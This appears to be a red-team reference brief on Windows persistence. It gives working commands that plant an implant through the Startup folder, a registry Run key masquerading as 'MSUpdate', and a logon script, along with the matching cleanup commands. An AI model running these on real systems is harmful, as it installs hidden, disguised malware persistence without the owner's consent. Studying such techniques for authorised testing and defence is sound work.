Why this topic matters
Persistence matters because it changes how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats persistence as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with persistence.
- Persistence
- User context
- Persistence via startup folder
- Persistence via starup folder delete
- Persistence via registry run keys
- Persistence via registry run keys delete
- Persistence via logon scripts
- Logon.bat
- Persistence via logon scripts delete
- Persistence via shortcut modification
Commands and snippets
copy c:\tools\badger.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\badger.exe"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d c:\tools\badger.exe /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "c:\tools\logon.bat" /t REG_SZ /f
@ECHO OFF C:\tools\badger.exe%
reg delete "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /f
wscript c:\tools\makelnk.vbs
Curated public references
- Nmap · Man.htmlnmap.org/book/man.html
- BloodHound Documentationbloodhound.specterops.io/
- GitHub · fortra / impacketgithub.com/fortra/impacket
- MITRE ATT&CKattack.mitre.org/